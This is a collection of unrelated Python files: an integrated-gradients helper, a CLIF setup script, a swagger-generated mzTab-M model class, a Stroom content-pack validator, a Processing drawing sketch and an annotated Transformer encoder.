explanation.append(np.multiply(_temp, step_sizes[i]))
# Format the return values according to the input sample.
if isinstance(sample, list):
return explanation
elif isinstance(sample, np.ndarray):
return explanation[0]
return -1
'''
Input: numpy array of a sample
Optional inputs:
- reference: reference values (defaulted to 0s).
- steps: # steps from reference values to the actual sample.
Output: list of numpy arrays to integrate over.
'''
@staticmethod
def linearly_interpolate(sample, reference=False, num_steps=50):
# Use default reference values if reference is not specified
if reference is False: reference = np.zeros(sample.shape)
# Reference and sample shape needs to match exactly
assert sample.shape == reference.shape
# Calculate the stepwise difference from reference to the actual sample.
ret = np.zeros(tuple([num_steps] +[i for i in sample.shape]))
for s in range(num_steps):
ret[s] = reference+(sample-reference)*(s*1.0/num_steps)
return ret, num_steps, (sample-reference)*(1.0/num_steps)
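# Illustrative sketch (not part of the original class): for a hypothetical 1-D sample and
# num_steps=4 with the default zero reference, the interpolated inputs have shape (4, 3) and
# sit at fractions 0, 1/4, 2/4 and 3/4 of the way from the reference to the sample; summing
# the gradients at those points and multiplying elementwise by the returned step size (as
# explain() does) gives the Riemann-sum approximation of the path integral.
#
#   >>> import numpy as np
#   >>> steps, n, delta = integrated_gradients.linearly_interpolate(np.array([4.0, 8.0, 0.0]), num_steps=4)
#   >>> steps.shape, n
#   ((4, 3), 4)
#   >>> delta
#   array([1., 2., 0.])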
|
#!/usr/bin/env python
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Setup configuration."""
import glob
import os
import pathlib
import typing
from clif import extension
import setuptools
def _find_clif_modules() -> typing.Iterable[extension.CLIFExtension]:
"""Build list of CLIFExtensions based on CLIF-generated sources under cwd.
Returns:
list of CLIF extensions for setuptools.setup's ext_modules arg
"""
modules = []
for clif_init in glob.glob('**/*_init.cc', recursive=True):
module_dir = pathlib.Path(clif_init).parts[0]
module_name = clif_init.replace('/', '.').replace('_init.cc', '')
clif_sources = [
# CLIF-generated sources (module.cc, module_init.cc)
clif_init.replace('_init', ''),
clif_init,
]
libraries = []
for lib in glob.glob(os.path.join(module_dir, 'lib*.a')):
lib = pathlib.Path(lib).stem.replace('lib', '', 1)
libraries.append(lib)
clif_extension = extension.CLIFExtension(
module_name, clif_sources, include_dirs=['./'],
libraries=libraries,
library_dirs=[module_dir])
modules.append(clif_extension)
return modules
setuptools.setup(
name='pyclif_examples',
version='1.0',
description='Python CLIF examples',
url='https://github.com/google/clif',
author='CLIF authors',
author_email='pyclif@googlegroups.com',
ext_modules=_find_clif_modules(),
)
|
# coding: utf-8
"""
mzTab-M reference implementation and validation API.
This is the mzTab-M reference implementation and validation API service. # noqa: E501
OpenAPI spec version: 2.0.0
Contact: nils.hoffmann@isas.de
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from mztab_m_swagger_client.models.indexed_element import IndexedElement # noqa: F401,E501
from mztab_m_swagger_client.models.instrument import Instrument # noqa: F401,E501
from mztab_m_swagger_client.models.parameter import Parameter # noqa: F401,E501
class MsRun(IndexedElement):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'location': 'str',
'instrument_ref': 'Instrument',
'format': 'Parameter',
'id_format': 'Parameter',
'fragmentation_method': 'list[Parameter]',
'scan_polarity': 'list[Parameter]',
'hash': 'str',
'hash_method': 'Parameter'
}
attribute_map = {
'name': 'name',
'location': 'location',
'instrument_ref': 'instrument_ref',
'format': 'format',
'id_format': 'id_format',
'fragmentation_method': 'fragmentation_method',
'scan_polarity': 'scan_polarity',
'hash': 'hash',
'hash_method': 'hash_method'
}
def __init__(self, name=None, location=None, instrument_ref=None, format=None, id_format=None, fragmentation_method=None, scan_polarity=None, hash=None, hash_method=None, **kwargs): # noqa: E501
"""MsRun - a model defined in Swagger""" # noqa: E501
super(MsRun, self).__init__(element_type="MsRun", **kwargs)
self._name = None
self._location = None
self._instrument_ref = None
self._format = None
self._id_format = None
self._fragmentation_method = None
self._scan_polarity = None
self._hash = None
self._hash_method = None
self.discriminator = 'element_type'
self.name = name
self.location = location
if instrument_ref is not None:
self.instrument_ref = instrument_ref
if format is not None:
self.format = format
if id_format is not None:
self.id_format = id_format
if fragmentation_method is not None:
self.fragmentation_method = fragmentation_method
if scan_polarity is not None:
self.scan_polarity = scan_polarity
if hash is not None:
self.hash = hash
if hash_method is not None:
self.hash_method = hash_method
@property
def name(self):
"""Gets the name of this MsRun. # noqa: E501
The msRun's name. # noqa: E501
:return: The name of this MsRun. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this MsRun.
The msRun's name. # noqa: E501
:param name: The name of this MsRun. # noqa: E501
:type: str
"""
# if name is None:
# raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def location(self):
"""Gets the location of this MsRun. # noqa: E501
The msRun's location URI. # noqa: E501
:return: The location of this MsRun. # noqa: E501
:rtype: str
"""
return self._location
@location.setter
def location(self, location):
"""Sets the location of this MsRun.
The msRun's location URI. # noqa: E501
:param location: The location of this MsRun. # noqa: E501
:type: str
"""
if location is None:
raise ValueError("Invalid value for `location`, must not be `None`") # noqa: E501
self._location = location
@property
def instrument_ref(self):
"""Gets the instrument_ref of this MsRun. # noqa: E501
The instrument on which this msRun was measured. # noqa: E501
:return: The instrument_ref of this MsRun. # noqa: E501
:rtype: Instrument
"""
return self._instrument_ref
@instrument_ref.setter
def instrument_ref(self, instrument_ref):
"""Sets the instrument_ref of this MsRun.
The instrument on which this msRun was measured. # noqa: E501
:param instrument_ref: The instrument_ref of this MsRun. # noqa: E501
:type: Instrument
"""
self._instrument_ref = instrument_ref
@property
def format(self):
"""Gets the format of this MsRun. # noqa: E501
The msRun's file format. # noqa: E501
:return: The format of this MsRun. # noqa: E501
:rtype: Parameter
"""
return self._format
@format.setter
def format(self, format):
"""Sets the format of this MsRun.
The msRun's file format. # noqa: E501
:param format: The format of this MsRun. # noqa: E501
:type: Parameter
"""
self._format = format
@property
def id_format(self):
"""Gets the id_format of this MsRun. # noqa: E501
The msRun's mass spectra id format. # noqa: E501
:return: The id_format of this MsRun. # noqa: E501
:rtype: Parameter
"""
return self._id_format
@id_format.setter
def id_format(self, id_format):
"""Sets the id_format of this MsRun.
The msRun's mass spectra id format. # noqa: E501
:param id_format: The id_format of this MsRun. # noqa: E501
:type: Parameter
"""
self._id_format = id_format
@property
def fragmentation_method(self):
"""Gets the fragmentation_method of this MsRun. # noqa: E501
The fragmentation methods applied during this msRun. # noqa: E501
:return: The fragmentation_method of this MsRun. # noqa: E501
:rtype: list[Parameter]
"""
return self._fragmentation_method
@fragmentation_method.setter
def fragmentation_method(self, fragmentation_method):
"""Sets the fragmentation_method of this MsRun.
The fragmentation methods applied during this msRun. # noqa: E501
:param fragmentation_method: The fragmentation_method of this MsRun. # noqa: E501
:type: list[Parameter]
"""
self._fragmentation_method = fragmentation_method
@property
def scan_polarity(self):
"""Gets the scan_polarity of this MsRun. # noqa: E501
The scan polarity/polarities used during this msRun. # noqa: E501
:return: The scan_polarity of this MsRun. # noqa: E501
:rtype: list[Parameter]
"""
return self._scan_polarity
@scan_polarity.setter
def scan_polarity(self, scan_polarity):
"""Sets the scan_polarity of this MsRun.
The scan polarity/polarities used during this msRun. # noqa: E501
:param scan_polarity: The scan_polarity of this MsRun. # noqa: E501
:type: list[Parameter]
"""
self._scan_polarity = scan_polarity
@property
def hash(self):
"""Gets the hash of this MsRun. # noqa: E501
The file hash value of this msRun's data file. # noqa: E501
:return: The hash of this MsRun. # noqa: E501
:rtype: str
"""
return self._hash
@hash.setter
def hash(self, hash):
"""Sets the hash of this MsRun.
The file hash value of this msRun's data file. # noqa: E501
:param hash: The hash of this MsRun. # noqa: E501
:type: str
"""
self._hash = hash
@property
def hash_method(self):
"""Gets the hash_method of this MsRun. # noqa: E501
The hash method used to calculate the file hash. # noqa: E501
:return: The hash_method of this MsRun. # noqa: E501
:rtype: Parameter
"""
return self._hash_method
@hash_method.setter
def hash_method(self, hash_method):
"""Sets the hash_method of this MsRun.
The hash method used to calculate the file hash. # noqa: E501
:param hash_method: The hash_method of this MsRun. # noqa: E501
:type: Parameter
"""
self._hash_method = hash_method
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(IndexedElement, dict):
for key, value in super(MsRun, self).items():
result[key] = value
if issubclass(MsRun, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, MsRun):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
#!/usr/bin/env python3
#**********************************************************************
# Copyright 2016 Crown Copyright
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#**********************************************************************
#**********************************************************************
# validateContentPacks.py
#
# Usage: validateContentPacks.py [--all] [packName ...]
# e.g.: validateContentPacks.py stroom-101 core-xml-schemas
# validateContentPacks.py --all
#
# Script to validate one or more content packs
#
# packName is the name of the sub-folder in stroom-content-source.
# Anything inside this folder is considered stroom content relative to
# stroom's root folder
# --all indicates to validate all pack folders found in stroom-content-source
#
#**********************************************************************
import configparser
import fnmatch
import logging
import os
import re
import shutil
import sys
import time
import xml.etree.ElementTree as ET
import zipfile
# logging.basicConfig(level=logging.DEBUG)
USAGE_TXT = "\
Usage:\nvalidateContentPacks.py [--all] [packName ...]\n\
e.g.\n\
To validate all content packs - validateContentPacks.py --all\n\
To validate specific named content packs - validateContentPacks.py pack-1 pack-2 pack-n"
SOURCE_DIR_NAME = "source"
TARGET_DIR_NAME = "target"
STROOM_CONTENT_DIR_NAME = "stroomContent"
FOLDER_ENTITY_TYPE = "folder"
FOLDER_ENTITY_SUFFIX = ".Folder.xml"
root_path = os.path.dirname(os.path.realpath(__file__))
source_path = os.path.join(root_path, SOURCE_DIR_NAME)
target_path = os.path.join(root_path, TARGET_DIR_NAME)
# Class for ascii colour codes for use in print statements
class Col:
RED = '\033[0;31m'
BRED = '\033[1;31m'
GREEN = '\033[0;32m'
BOLD_GREEN = '\033[1;32m'
YELLOW = '\033[0;33m'
BOLD_YELLOW = '\033[1;33m'
BLUE = '\033[0;34m'
BOLD_BLUE = '\033[1;34m'
LIGHT_GREY = '\033[37m'
DARK_GREY = '\033[90m'
MAGENTA = '\033[0;35m'
BOLD_MAGENTA = '\033[1;35m'
CYAN = '\033[0;36m'
BOLD_CYAN = '\033[1;36m'
NC = '\033[0m' # No Color
@staticmethod
def _colourise(string, colour_code):
return ''.join([colour_code, string, Col.NC])
@staticmethod
def red(string):
return Col._colourise(string, Col.RED)
@staticmethod
def bold_red(string):
return Col._colourise(string, Col.BRED)
@staticmethod
def green(string):
return Col._colourise(string, Col.GREEN)
@staticmethod
def bold_green(string):
return Col._colourise(string, Col.BOLD_GREEN)
@staticmethod
def yellow(string):
return Col._colourise(string, Col.YELLOW)
@staticmethod
def bold_yellow(string):
return Col._colourise(string, Col.BOLD_YELLOW)
@staticmethod
def blue(string):
return Col._colourise(string, Col.BLUE)
@staticmethod
def bold_blue(string):
return Col._colourise(string, Col.BOLD_BLUE)
@staticmethod
def light_grey(string):
return Col._colourise(string, Col.LIGHT_GREY)
@staticmethod
def dark_grey(string):
return Col._colourise(string, Col.DARK_GREY)
@staticmethod
def magenta(string):
return Col._colourise(string, Col.MAGENTA)
@staticmethod
def bold_magenta(string):
return Col._colourise(string, Col.BOLD_MAGENTA)
@staticmethod
def cyan(string):
return Col._colourise(string, Col.CYAN)
@staticmethod
def bold_cyan(string):
return Col._colourise(string, Col.BOLD_CYAN)
# Class to represent a folder in the hierarchy of folders/entities.
# A folder can contain many child folders and many child entities
class Folder:
def __init__(self, full_path, name, parent):
self.full_path = full_path
self.name = name
self.parent = parent
# (entity_type, name) => DocRef dict
self.entities = dict()
# name => Folder dict
self.child_folders = dict()
def __str__(self):
return "full_path: {}, name: {}".format(self.full_path, self.name)
# Adds an entity to this folder
def _add_entity(self, doc_ref):
key = (doc_ref.entity_type, doc_ref.name)
if not key in self.entities:
self.entities[key] = doc_ref
else:
existing_doc_ref = self.entities[key]
print_error(("Multiple entities with the same name and type in "
+ "folder {}, name: {}, type: {}, UUIDs: {}, {}")
.format(
Col.blue(self.full_path),
Col.green(doc_ref.name),
Col.cyan(doc_ref.entity_type),
Col.yellow(existing_doc_ref.uuid),
Col.yellow(doc_ref.uuid)))
print("\nDisplaying tree so far")
self.print_tree()
exit(1)
# Adds a child folder with passed name to the dict of child folders
# Returns the created folder instance
def _add_child_folder(self, name):
if not name in self.child_folders:
logging.debug("Creating child folder {} in folder [{}]".format(
name, self))
if (self.full_path == ""):
child_full_path = name
else:
child_full_path = "/".join([self.full_path, name])
child_full_path = child_full_path.replace("//", "/")
child_folder = Folder(child_full_path, name, self)
self.child_folders[name] = child_folder
else:
logging.debug("Folder {} already exists in folder [{}]".format(
name, self))
return self.child_folders[name]
# Adds node to this folder, creating intermediate folders as required
def add_node(self, node):
logging.debug("add_node called, self [{}] to folder [{}]"
.format(self, self))
# time.sleep(0.5)
if node.path == self.full_path:
# entity belongs in this folder so just add it
logging.debug("Adding entity [{}] to folder [{}]"
.format(node.doc_ref, self))
self._add_entity(node.doc_ref)
else:
# entity belongs further down so create the folder at this
# level and try again
logging.debug("node.path [{}], self.full_path [{}]"
.format(node.path, self.full_path))
# ensure we have no trailing slash
relative_folder = node.path.rstrip("/")
# if self is /A/B and node is /A/B/C/D
# the relative path is /C/D
relative_folder = relative_folder.replace(self.full_path, "")
relative_folder = relative_folder.lstrip("/")
child_folder_name = relative_folder.split("/")[0]
logging.debug("relative_folder [{}], child_folder_name [{}]"
.format(relative_folder, child_folder_name))
child_folder = self._add_child_folder(child_folder_name)
# recursive call to continue trying to add the node
child_folder.add_node(node)
# Print this folder and all folders/entities below it
def print_tree(self, level=-1):
logging.debug("print_tree called with self [{}], level {}"
.format(self, level))
single_indent = " "
indent_str = single_indent * level
        if self.name is not None:
print("{}+ {}".format(
indent_str,
Col.bold_blue(self.name)))
# Output all the folders (and their contents) first
for child_folder_name, child_folder in sorted(self.child_folders.items()):
child_folder.print_tree(level + 1)
# Now output all the entities, sorted by name then entity type
for type_name_tuple, doc_ref in sorted(
self.entities.items(),
key=lambda item: (item[0][1], item[0][0])):
preV6Str = "(pre-v6)" if doc_ref.isPreV6 else ""
print("{}{}- {} [{}] {} {}"
.format(
indent_str,
single_indent,
Col.green(doc_ref.name),
Col.cyan(doc_ref.entity_type),
Col.dark_grey(doc_ref.uuid),
Col.red(preV6Str)))
@staticmethod
def create_root_folder():
return Folder("", None, None)
# Class to represent a stroom DocRef object that uniquely defines an entity
class DocRef:
def __init__(self, entity_type, uuid, name, isPreV6=False):
self.entity_type = entity_type
self.uuid = uuid
self.name = name
self.isPreV6 = isPreV6
def __str__(self):
return "entity_type: {}, uuid: {}, name: {}, isPreV6 {}".format(
self.entity_type, self.uuid, self.name, self.isPreV6)
# Class to represent a .node file, i.e. a DocRef with a path to provide a
# location in the folder tree
class Node:
# def __init__(self, path, entity_type, uuid, name):
def __init__(self, path, doc_ref):
self.path = path
self.doc_ref = doc_ref
def __str__(self):
return "path: {}, doc_ref: {}".format(self.path, self.doc_ref)
def list_content_packs():
for the_file in os.listdir(source_path):
file_path = os.path.join(source_path, the_file)
if os.path.isdir(file_path):
print(" " + the_file)
def print_usage():
print(USAGE_TXT)
print("\nAvailable content packs:")
list_content_packs()
print("\n")
def print_error(msg):
print(''.join([Col.red("ERROR"), " - ", msg]))
def error_exit(msg):
print_error(msg)
exit(1)
def extract_doc_ref_from_xml(entity_file):
if not os.path.isfile(entity_file):
error_exit("Entity file {} does not exist".format(entity_file))
# logging.debug("Extracting uuid for {}".format(entity_file))
xml_root = ET.parse(entity_file).getroot()
entity_type = xml_root.tag
uuidElm = xml_root.find('uuid')
nameElm = xml_root.find('name')
    uuid = uuidElm.text if uuidElm is not None else None
    name = nameElm.text if nameElm is not None else None
return DocRef(entity_type, uuid, name, True)
def parse_node_file(node_file):
if not os.path.isfile(node_file):
error_exit("Node file {} does not exist".format(node_file))
dummy_section_name = 'dummy_section'
# ConfigParser is meant to deal with .ini files so adding dummy_section
# is a bit of a hack to work with section-less config files that look
# like .ini files.
with open(node_file, 'r') as f:
config_string = '[' + dummy_section_name + ']\n' + f.read()
config = configparser.ConfigParser()
config.read_string(config_string)
return config[dummy_section_name]
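# Illustration (assumed .node layout): a .node file contains plain key=value lines such as
#     uuid=<some-uuid>
#     type=Pipeline
#     name=Example Pipeline
#     path=Example Group/Pipelines
# It has no [section] header, so the injected [dummy_section] lets ConfigParser read it and
# the values come back via .get('uuid'), .get('type'), .get('name') and .get('path').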
# Turn the doc_ref name into a safe form for use in a filename
def get_safe_file_name(doc_ref):
# Logic duplicated from
# stroom.importexport.server.ImportExportFileNameUtil
safe_name = re.sub("[^A-Za-z0-9]", "_", doc_ref.name)
# Limit to 100 chars
safe_name = safe_name[0:100]
return safe_name
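# For example, a doc_ref named "My Feed (v2)" becomes "My_Feed__v2_" (every non-alphanumeric
# character is replaced with an underscore, then the result is truncated to 100 characters).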
def validate_node_against_node_file(node, node_file):
# This validation matches the code in
# stroom.importexport.server.ImportExportFileNameUtil
filename = os.path.basename(node_file)
doc_ref = node.doc_ref
safe_name = get_safe_file_name(doc_ref)
    pattern = r"{}\.{}\.{}\.node".format(
safe_name, doc_ref.entity_type, doc_ref.uuid)
    if re.match(pattern, filename) is None:
error_exit("The name of node file {} does not match expected pattern {}"
.format(
Col.blue(node_file),
Col.green(pattern)))
def extract_node_from_node_file(node_file):
node_config = parse_node_file(node_file)
uuid = node_config.get('uuid')
entity_type = node_config.get('type')
name = node_config.get('name')
path = node_config.get('path')
doc_ref = DocRef(entity_type, uuid, name)
node = Node(path, doc_ref)
validate_node_against_node_file(node, node_file)
return node
def validate_pre_stroom_six_folder_uuids(stroom_content_path, path_to_uuid_dict):
logging.debug("validate_pre_stroom_six_folder_uuids([{}]) called"
.format(stroom_content_path))
# make sure we don't have multiple folder entities with
# different uuids else this may cause odd behaviour on import
for root, dirnames, filenames in os.walk(stroom_content_path):
for dirname in dirnames:
logging.debug("dirname: {}".format(dirname))
full_filename = os.path.join(
root, dirname, '..', dirname + FOLDER_ENTITY_SUFFIX)
logging.debug("full_filename: {}".format(full_filename))
entity_path = os.path.relpath(
os.path.join(root, dirname), stroom_content_path)
logging.debug("entity_path: {}".format(entity_path))
doc_ref = extract_doc_ref_from_xml(full_filename)
uuid = doc_ref.uuid
            if uuid is None:
error_exit("Entity file {} does not have a UUID"
.format(Col.blue(full_filename)))
logging.debug("uuid = {}".format(uuid))
            if entity_path not in path_to_uuid_dict:
path_to_uuid_dict[entity_path] = uuid
elif path_to_uuid_dict[entity_path] != uuid:
error_exit("Multiple uuids exist for path {}"
.format(Col.blue(entity_path)))
def is_pack_stroom_six_or_greater(pack_dir):
# Determine if this pack is in v6+ format or not by the presence
# of any .node files
is_stroom_six_or_above = False
for root, dirnames, filenames in os.walk(pack_dir):
if not is_stroom_six_or_above:
for filename in filenames:
if not is_stroom_six_or_above and filename.endswith('.node'):
is_stroom_six_or_above = True
break
return is_stroom_six_or_above
def check_if_uuid_already_used(doc_ref, uuid_to_doc_ref_dict, full_filename):
if doc_ref.uuid in uuid_to_doc_ref_dict:
existing_doc_ref = uuid_to_doc_ref_dict.get(doc_ref.uuid)
error_exit(("Entity {} with type {} has a duplicate UUID {}. "
+ "Duplicate of entity {} with type {}").format(
Col.blue(full_filename),
Col.cyan(doc_ref.entity_type),
Col.yellow(doc_ref.uuid),
Col.green(existing_doc_ref.name),
Col.cyan(existing_doc_ref.entity_type)))
else:
# Add our unique uuid/doc_ref to the dict
uuid_to_doc_ref_dict[doc_ref.uuid] = doc_ref
def extract_entity_uuids_from_xml(pack_dir, uuid_to_doc_ref_dict, node_tree):
for root, dirnames, filenames in os.walk(pack_dir):
for xml_file in fnmatch.filter(filenames, '*.xml'):
if not xml_file.endswith(".data.xml"):
logging.debug("root: {}".format(root))
logging.debug("xml_file: {}".format(xml_file))
full_filename = os.path.join(root, xml_file)
doc_ref = extract_doc_ref_from_xml(full_filename)
logging.debug("doc_ref: {}".format(doc_ref))
if doc_ref.entity_type != "folder":
# this is a stroom entity, not a folder
entity_path = os.path.relpath(
root, pack_dir)
logging.debug("entity_path: {}".format(entity_path))
node = Node(entity_path, doc_ref)
# Add the found node to our tree, which will ensure the
# entity name is unique within its path
node_tree.add_node(node)
if doc_ref.entity_type != FOLDER_ENTITY_TYPE:
check_if_uuid_already_used(
doc_ref,
uuid_to_doc_ref_dict,
full_filename)
def extract_entity_uuids_from_node_files(
pack_dir, uuid_to_doc_ref_dict, node_tree):
for root, dirnames, filenames in os.walk(pack_dir):
for node_file in fnmatch.filter(filenames, '*.node'):
logging.debug("node_file: {}".format(node_file))
full_filename = os.path.join(root, node_file)
logging.debug("full_filename: {}".format(full_filename))
node = extract_node_from_node_file(full_filename)
# Add the found node to our tree, which will ensure the
# entity name is unique within its path
node_tree.add_node(node)
check_if_uuid_already_used(
node.doc_ref,
uuid_to_doc_ref_dict,
full_filename)
def validate_pack(
pack, root_path, path_to_uuid_dict, uuid_to_doc_ref_dict, node_tree):
# validation rules:
    # All folder entities (pre-v6 only) must have a unique UUID
# All entities must have a unique UUID
# All entities must have a unique (name, type) within a folder
# All node files must have a filename that matches a specific format
pack_path = os.path.join(root_path, pack)
    # check the folder exists for the pack name
if not os.path.isdir(pack_path):
error_exit("Pack {} does not exist in {}".format(pack, root_path))
stroom_content_path = os.path.join(pack_path, STROOM_CONTENT_DIR_NAME)
# Determine if this pack is in v6+ format or not by the presence
# of any .node files
is_stroom_six_or_above = is_pack_stroom_six_or_greater(stroom_content_path)
preV6Str = "" if is_stroom_six_or_above else "(pre-v6)"
print("Validating pack {} {}".format(
Col.green(pack),
Col.red(preV6Str)))
if not is_stroom_six_or_above:
validate_pre_stroom_six_folder_uuids(
stroom_content_path,
path_to_uuid_dict)
    # Loop through all the xml files finding those that have a uuid element;
    # for each one that isn't a folder entity, make sure the uuid
    # is not already used by another entity
if is_stroom_six_or_above:
extract_entity_uuids_from_node_files(
stroom_content_path,
uuid_to_doc_ref_dict,
node_tree)
else:
extract_entity_uuids_from_xml(
stroom_content_path,
uuid_to_doc_ref_dict,
node_tree)
def validate_packs(pack_list, root_path):
# logging.debug("Validating packs: {}".format(pack_list))
# A dict of path=>uuid mappings to establish if we have multiple folder
# paths with the same uuid (pre stroom6 only)
path_to_uuid_dict = dict()
# A dict of uuid=>docref
uuid_to_doc_ref_dict = dict()
# Create the root node of the folder/entity tree
node_tree = Folder.create_root_folder()
print("\nValidating content packs")
for pack in pack_list:
validate_pack(
pack,
root_path,
path_to_uuid_dict,
uuid_to_doc_ref_dict,
node_tree)
print("\nUUIDs for pre-v6 paths:")
for key in sorted(path_to_uuid_dict):
print("{} - {}".format(
Col.bold_blue(key),
Col.dark_grey(path_to_uuid_dict[key])))
print("\nDisplaying the complete explorer tree for the chosen packs\n")
node_tree.print_tree()
print("\nValidation completed with no errors")
# Script proper starts here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if len(sys.argv) == 1:
print_error("No arguments supplied")
print_usage()
exit(1)
isAllPacks = False
packs_to_build = []
for arg in sys.argv[1:]:
if arg == "--all":
isAllPacks = True
else:
packs_to_build.append(arg)
if len(packs_to_build) > 0 and isAllPacks:
print_error("Cannot specify --all and named packs")
print_usage()
exit(1)
if len(packs_to_build) == 0 and not isAllPacks:
print_error("Must specify --all or provide a list of named packs")
print_usage()
exit(1)
if isAllPacks:
print("Processing all content packs")
for list_entry in os.listdir(source_path):
if os.path.isdir(os.path.join(source_path, list_entry)):
packs_to_build.append(list_entry)
else:
print("Processing packs: {}".format(packs_to_build))
print("Using root path: {}".format(Col.blue(root_path)))
print("Using source path: {}".format(Col.blue(source_path)))
validate_packs(packs_to_build, source_path)
print("Done!")
exit(0)
|
a = list(range(10))
step = 30
def setup ():
size (500 , 500)
smooth ()
noStroke ()
myInit ()
def myInit ():
global a
for i in range(len(a)):
a[i]=list(range(int(random (0, 10))))
for j in range(len(a[i])):
a[i][j] = int(random (0, 30))
def draw ():
global a, step
fill (180 , 50)
background (10)
for i in range(len(a)):
for j in range(len(a[i])):
stroke (100)
strokeWeight (1)
fill (50)
rect (i* step + 100 , j* step + 100 , step , step )
noStroke ()
fill (250 , 90)
ellipse (i* step +115 , j* step +115 , a[i][j], a[i][j])
|
# Copyright: http://nlp.seas.harvard.edu/2018/04/03/attention.html
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import math, copy, time
from torch.autograd import Variable
import seaborn
seaborn.set_context(context="talk")
# ENCODER: CLONE
def clones(module, N):
"Produce N identical layers."
return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])
# ENCODER
class Encoder(nn.Module):
"Core encoder is a stack of N layers"
def __init__(self, layer, N):
super(Encoder, self).__init__()
self.layers = clones(layer, N)
self.norm = LayerNorm(layer.size)
def forward(self, x, mask=None):
"Pass the input (and mask) through each layer in turn."
for layer in self.layers:
x = layer(x, mask)
return self.norm(x)
# ATTENTION #
def attention(query, key, value, mask=None, dropout=None):
"Compute 'Scaled Dot Product Attention'"
d_k = query.size(-1)
scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)
if mask is not None:
scores = scores.masked_fill(mask == 0, -1e9)
p_attn = F.softmax(scores, dim = -1)
if dropout is not None:
p_attn = dropout(p_attn)
    return torch.matmul(p_attn, value), p_attn  # returned as (weighted values, attention weights); consumed as (x, self.attn) in MultiHeadedAttention
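# For reference, this is Attention(Q, K, V) = softmax(Q K^T / sqrt(d_k)) V; masked
# positions are set to -1e9 before the softmax so they receive (near-)zero weight.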
# MULTI-HEAD ATTENTION
class MultiHeadedAttention(nn.Module):
def __init__(self, h, d_model, dropout=0.1):
"Take in model size and number of heads."
super(MultiHeadedAttention, self).__init__()
assert d_model % h == 0
# We assume d_v always equals d_k
self.d_k = d_model // h
self.h = h
self.linears = clones(nn.Linear(d_model, d_model), 4)
self.attn = None
self.dropout = nn.Dropout(p=dropout)
def forward(self, query, key, value, mask=None):
"Implements Figure 2"
if mask is not None:
# Same mask applied to all h heads.
mask = mask.unsqueeze(1)
nbatches = query.size(0)
# 1) Do all the linear projections in batch from d_model => h x d_k
query, key, value = \
[l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)
for l, x in zip(self.linears, (query, key, value))]
# 2) Apply attention on all the projected vectors in batch.
x, self.attn = attention(query, key, value, mask=mask, dropout=self.dropout)
# 3) "Concat" using a view and apply a final linear.
x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k)
return self.linears[-1](x)
# LAYER NORM
class LayerNorm(nn.Module):
"Construct a layernorm module (See citation for details)."
def __init__(self, features, eps=1e-6):
super(LayerNorm, self).__init__()
self.a_2 = nn.Parameter(torch.ones(features))
self.b_2 = nn.Parameter(torch.zeros(features))
self.eps = eps
def forward(self, x):
mean = x.mean(-1, keepdim=True)
std = x.std(-1, keepdim=True)
return self.a_2 * (x - mean) / (std + self.eps) + self.b_2
# SUBLAYER CONNECTION (Residual connection)
class SublayerConnection(nn.Module):
"""
A residual connection followed by a layer norm.
Note for code simplicity the norm is first as opposed to last.
"""
def __init__(self, size, dropout):
super(SublayerConnection, self).__init__()
self.norm = LayerNorm(size)
self.dropout = nn.Dropout(dropout)
def forward(self, x, sublayer):
"Apply residual connection to any sublayer with the same size."
return x + self.dropout(sublayer(self.norm(x)))
# POSITION-WISE FEED-FORWARD
class PositionwiseFeedForward(nn.Module):
"Implements FFN equation."
def __init__(self, d_model, dropout=0.1): #d_ff,
super(PositionwiseFeedForward, self).__init__()
#self.w_1 = nn.Linear(d_model, int(d_model/2))
#self.w_2 = nn.Linear(int(d_model/2), d_model)
self.w = nn.Linear(d_model, d_model)
self.dropout = nn.Dropout(dropout)
def forward(self, x):
return self.dropout(F.relu(self.w(x))) # self.w_2(self.dropout(F.relu(self.w_1(x))))
# ENCODER LAYER
class EncoderLayer(nn.Module):
"Encoder is made up of self-attn and feed forward (defined below)"
def __init__(self, size, self_attn, feed_forward, dropout):
super(EncoderLayer, self).__init__()
self.self_attn = self_attn
self.feed_forward = feed_forward
self.sublayer = clones(SublayerConnection(size, dropout), 2)
self.size = size
